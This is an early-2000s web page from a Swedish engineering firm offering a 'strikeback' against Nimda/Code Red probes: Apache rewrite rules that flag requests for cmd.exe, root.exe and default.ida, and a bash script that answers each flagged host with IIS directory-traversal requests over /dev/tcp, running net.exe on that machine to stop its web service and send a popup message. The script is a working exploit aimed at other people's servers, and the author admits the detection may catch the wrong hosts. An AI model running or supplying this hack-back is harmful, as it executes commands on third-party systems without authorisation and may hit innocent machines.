Ingenjörsfirman Steen

-:Firewall TIPS:-

Huvudmeny

Inloggning för alla

Användares hemsidor

WebRadio

NoNimda

Tired about all code-red requests on your webserver ?

This is for all Apache users and possible other web-servers.

Before we start:
You need to have bash wich "sockets" installed so you can do
socket connection from within shellscript. The methode is
brute and simple, it is not tested under heavy load yet.

(Another version written C and Java is underway)

If you can make it simple DO IT SIMPLE. Almost
all people understand shellscript, but not C or Java code.

Two files to set up:
We need to add support for RewriteRules in apache, the idea is
to catch nimda requests with Apache. This is the tricky part, we cannot ever
be totally sure if it is a nimda or someting else.
In addition we need a small shellscript for the contra request to the infected IIS.


File 1)

Add this in the ### Section 2: 'Main' server configuration of apache,
afther the ServerAdmin root@localhost tag, in httpd.conf:

RewriteEngine on
RewriteCond %{REQUEST_URI} default.ida [OR]
RewriteCond %{REQUEST_URI} cmd.exe [OR]
RewriteCond %{REQUEST_URI} root.exe
RewriteLogLevel 1
RewriteLog |/tmp/strikeback.sh
RewriteRule ^.*$ http://www.ing-steen.se [L]

The RewriteCond is not specially intelligent written, they will trap
everyting that contains default.ida, cmd.exe or root.exe. You need to
activate RewriteLogLevel 1, at least. However there are other ways with
maps and so on, but we skip them, keep it simple.

File 2)

The log is simply piped to our schellscript in a path there everyone have
r-x rights. The shellscript can then deal with the request. This is a rude
way to solve this, the shellscript strikeback.sh is called every time
anyone is requesting somthing at our apache webserver.
The shellscript strikeback.sh looks like this:

#!/bin/bash
#strikeback.sh
read URI
REMOTE=`echo $URI | grep -i redirect | cut -d" " -f1`
if [ ! -z $REMOTE ];then
echo "GET
http://$REMOTE/scripts/..%%35c../winnt/system32/net.exe%20stop%20World%20Wide%20Web%20Publishing%20Service\n\n" > /dev/tcp/$REMOTE/80
echo "GET
http://<IP>/scripts/..%%35c../winnt/system32/net.exe%20send%20127.0.0.1%20Your%20Web-Server%20is%20contaminated%20by%20a%20trojan%20!!\n\n" > /dev/tcp/$REMOTE/80
fi
echo $URI >>/tmp/logtest
exit 0

We simply read from stdin and cut out the IP/HOSTNAME, the first word in
logfile, to REMOTE. We need to check whenever "redirect" is printed in the
log=apache rewrite matched a condition. If REMOTE contain somthing we probely
now have one infected server to gently shut down out there.

We use a regular URL GET pattern with some modifications, you can send more
than one. The one above stop the IIS-WWW-server in a proper way and sends a
winpopup message to the administrator. All this is
echoed to /dev/tcp/$REMOTE/80, a TCP socket connection to port 80.

The log itself is echoed out in a file, just for logging purposes :-)

// Peter Steen, Ingenjörsfirman Steen

mailto:webmaster@ing-steen.se

Besökare sedan 2002-01-28: 

( Sidan uppdaterad lördag, 04-maj-2002 20:28:31 CEST)